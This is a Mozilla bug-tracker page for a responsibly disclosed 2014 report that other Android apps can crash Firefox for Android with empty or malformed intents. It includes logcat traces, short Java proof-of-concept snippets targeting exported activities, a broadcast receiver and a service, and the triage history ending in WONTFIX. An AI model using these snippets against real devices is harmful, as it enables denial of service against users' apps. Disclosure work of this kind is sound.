Other Android apps can send malformed intents to crash Firefox

RESOLVED WONTFIX

Status

()

Firefox for Android
Web Apps
P1
normal
RESOLVED WONTFIX
4 years ago
7 months ago

People

(Reporter: curtisk, Unassigned)

Tracking

({csectype-dos, sec-low})

unspecified
csectype-dos, sec-low
Points:
---
Bug Flags:
sec-bounty -

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [reporter-external][verif?][WebRuntime])

From: Claudiu Chelaru <claxche@gmail.com>
Subject: Security Bug Bounty: 103 ways to crash Firefox for Android
Message-Id: <6FCFE5B0-80F8-4D46-BF16-369834049089@gmail.com>
Date: Sat, 5 Jul 2014 14:04:15 +0300
To: security@mozilla.org
-----//-----
Hi,

During my research I’ve found some issues regarding Firefox for Android - (org.mozilla.firefox) via cross application exploitation. Upon receiving malformed data the app will crash with the following message: “Unfortunately, Firefox has stopped.” Tested on Samsung Galaxy S3 - Android 4.3 API 18.

1) Activities
Firefox crashes if an Intent with no arguments is sent to any the following Activities:
- org.mozilla.firefox.Webapp
- org.mozilla.firefox.WebApps$WebApp0
- org.mozilla.firefox.WebApps$WebApp1
- org.mozilla.firefox.WebApps$WebApp2
- org.mozilla.firefox.WebApps$WebApp3
- org.mozilla.firefox.WebApps$WebApp4
- org.mozilla.firefox.WebApps$WebApp5
- org.mozilla.firefox.WebApps$WebApp6
- org.mozilla.firefox.WebApps$WebApp7
- org.mozilla.firefox.WebApps$WebApp8
- org.mozilla.firefox.WebApps$WebApp9
- org.mozilla.firefox.WebApps$WebApp10
- org.mozilla.firefox.WebApps$WebApp11
- org.mozilla.firefox.WebApps$WebApp12
- org.mozilla.firefox.WebApps$WebApp13
- org.mozilla.firefox.WebApps$WebApp14
- org.mozilla.firefox.WebApps$WebApp15
- org.mozilla.firefox.WebApps$WebApp16
- org.mozilla.firefox.WebApps$WebApp17
- org.mozilla.firefox.WebApps$WebApp18
- org.mozilla.firefox.WebApps$WebApp19
- org.mozilla.firefox.WebApps$WebApp20
- org.mozilla.firefox.WebApps$WebApp21
- org.mozilla.firefox.WebApps$WebApp22
- org.mozilla.firefox.WebApps$WebApp23
- org.mozilla.firefox.WebApps$WebApp24
- org.mozilla.firefox.WebApps$WebApp25
- org.mozilla.firefox.WebApps$WebApp26
- org.mozilla.firefox.WebApps$WebApp27
- org.mozilla.firefox.WebApps$WebApp28
- org.mozilla.firefox.WebApps$WebApp29
- org.mozilla.firefox.WebApps$WebApp30
- org.mozilla.firefox.WebApps$WebApp31
- org.mozilla.firefox.WebApps$WebApp32
- org.mozilla.firefox.WebApps$WebApp33
- org.mozilla.firefox.WebApps$WebApp34
- org.mozilla.firefox.WebApps$WebApp35
- org.mozilla.firefox.WebApps$WebApp36
- org.mozilla.firefox.WebApps$WebApp37
- org.mozilla.firefox.WebApps$WebApp38
- org.mozilla.firefox.WebApps$WebApp39
- org.mozilla.firefox.WebApps$WebApp40
- org.mozilla.firefox.WebApps$WebApp41
- org.mozilla.firefox.WebApps$WebApp42
- org.mozilla.firefox.WebApps$WebApp43
- org.mozilla.firefox.WebApps$WebApp44
- org.mozilla.firefox.WebApps$WebApp45
- org.mozilla.firefox.WebApps$WebApp46
- org.mozilla.firefox.WebApps$WebApp47
- org.mozilla.firefox.WebApps$WebApp48
- org.mozilla.firefox.WebApps$WebApp49
- org.mozilla.firefox.WebApps$WebApp50
- org.mozilla.firefox.WebApps$WebApp51
- org.mozilla.firefox.WebApps$WebApp52
- org.mozilla.firefox.WebApps$WebApp53
- org.mozilla.firefox.WebApps$WebApp54
- org.mozilla.firefox.WebApps$WebApp55
- org.mozilla.firefox.WebApps$WebApp56
- org.mozilla.firefox.WebApps$WebApp57
- org.mozilla.firefox.WebApps$WebApp58
- org.mozilla.firefox.WebApps$WebApp59
- org.mozilla.firefox.WebApps$WebApp60
- org.mozilla.firefox.WebApps$WebApp61
- org.mozilla.firefox.WebApps$WebApp62
- org.mozilla.firefox.WebApps$WebApp63
- org.mozilla.firefox.WebApps$WebApp64
- org.mozilla.firefox.WebApps$WebApp65
- org.mozilla.firefox.WebApps$WebApp66
- org.mozilla.firefox.WebApps$WebApp67
- org.mozilla.firefox.WebApps$WebApp68
- org.mozilla.firefox.WebApps$WebApp69
- org.mozilla.firefox.WebApps$WebApp70
- org.mozilla.firefox.WebApps$WebApp71
- org.mozilla.firefox.WebApps$WebApp72
- org.mozilla.firefox.WebApps$WebApp73
- org.mozilla.firefox.WebApps$WebApp74
- org.mozilla.firefox.WebApps$WebApp75
- org.mozilla.firefox.WebApps$WebApp76
- org.mozilla.firefox.WebApps$WebApp77
- org.mozilla.firefox.WebApps$WebApp78
- org.mozilla.firefox.WebApps$WebApp79
- org.mozilla.firefox.WebApps$WebApp80
- org.mozilla.firefox.WebApps$WebApp81
- org.mozilla.firefox.WebApps$WebApp82
- org.mozilla.firefox.WebApps$WebApp83
- org.mozilla.firefox.WebApps$WebApp84
- org.mozilla.firefox.WebApps$WebApp85
- org.mozilla.firefox.WebApps$WebApp86
- org.mozilla.firefox.WebApps$WebApp87
- org.mozilla.firefox.WebApps$WebApp88
- org.mozilla.firefox.WebApps$WebApp89
- org.mozilla.firefox.WebApps$WebApp90
- org.mozilla.firefox.WebApps$WebApp91
- org.mozilla.firefox.WebApps$WebApp92
- org.mozilla.firefox.WebApps$WebApp93
- org.mozilla.firefox.WebApps$WebApp94
- org.mozilla.firefox.WebApps$WebApp95
- org.mozilla.firefox.WebApps$WebApp96
- org.mozilla.firefox.WebApps$WebApp97
- org.mozilla.firefox.WebApps$WebApp98
- org.mozilla.firefox.WebApps$WebApp99

- The logcat log contains the following messages to confirming that the application has crashed (applicable for all WebApps Classes as well):
* "FATAL EXCEPTION: main"
* "E/AndroidRuntime( 3055): android.app.SuperNotCalledException: Activity {org.mozilla.firefox/org.mozilla.firefox.Webapp} did not call through to super.onCreate()"
* "I/ActivityManager(  353): Process org.mozilla.firefox:org.mozilla.firefox.Webapp (pid 3055) has died."

- Proof of Concept (applicable for all WebApps Classes as well):
Intent intent = new Intent();
intent.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.firefox.Webapp"));
startActivity(intent);


2) Broadcast Receivers
Firefox crashes if an Intent is broadcasted to "org.mozilla.gecko.webapp.UninstallListener" with no arguments.

- The logcat log contains the following messages to confirming that the application has crashed:
* "E/AndroidRuntime( 3071): FATAL EXCEPTION: main"
* "E/AndroidRuntime( 3071): java.lang.RuntimeException: Unable to start receiver org.mozilla.gecko.webapp.UninstallListener: java.lang.NullPointerException"

- Proof of Concept:
Intent intent = new Intent();
intent.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.gecko.webapp.UninstallListener"));
sendBroadcast(intent);


3) Services
Firefox crashes if a random message is sent to "org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService".

- The logcat log contains the following messages to confirming that the application has crashed:
* "E/AndroidRuntime( 3217): FATAL EXCEPTION: main"
* "E/AndroidRuntime( 3217): java.lang.RuntimeException: Unable to bind to service org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService@5274670c with Intent { cmp=org.mozilla.firefox/org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService }: java.lang.NullPointerException"

- Proof of Concept:
Intent service = new Intent();
service.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService"));
v.getContext().bindService(service, new ServiceConnection() {
   @Override
   public void onServiceConnected(ComponentName name, IBinder service) {
       Messenger messenger = new Messenger(service);
       try {
       messenger.send(Message.obtain(null, 1, 2, 3));
       } catch (RemoteException e) { }								
   }												
} , Context.BIND_AUTO_CREATE);


Kind Regards,
Claudiu Chelaru
assigned to mgoodwin for verification
Assignee: nobody → mgoodwin
Flags: sec-bounty?
Whiteboard: [reporter-external][verif?]
Summary: crashes Intents → crashes in intents
Component: General → Web Apps
QA Contact: aaron.train
Going to break point 3 into a separate bug.
See Also: → bug 1036459
Priority: -- → P1
Whiteboard: [reporter-external][verif?] → [reporter-external][verif?][WebRuntime]
Assignee: mgoodwin → nobody
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: sec-bounty? → sec-bounty-
Keywords: csectype-dos
Summary: crashes in intents → Other Android apps can send malformed intents to crash Firefox
Keywords: sec-low

Updated

2 years ago
Group: core-security → firefox-core-security
Per bug 1235869, we're going to disable the Android web runtime, so we won't fix this bug in it.

(This is part of a bulk resolution of bugs in the Firefox for Android::Web Apps component, from which I attempted to exclude bugs that are not specific to the runtime, but it's possible that I included one accidentally.  If so, I'm sorry, and please reopen the bug!)
Status: NEW → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → WONTFIX
Group: firefox-core-security
You need to log in before you can comment on or make changes to this bug.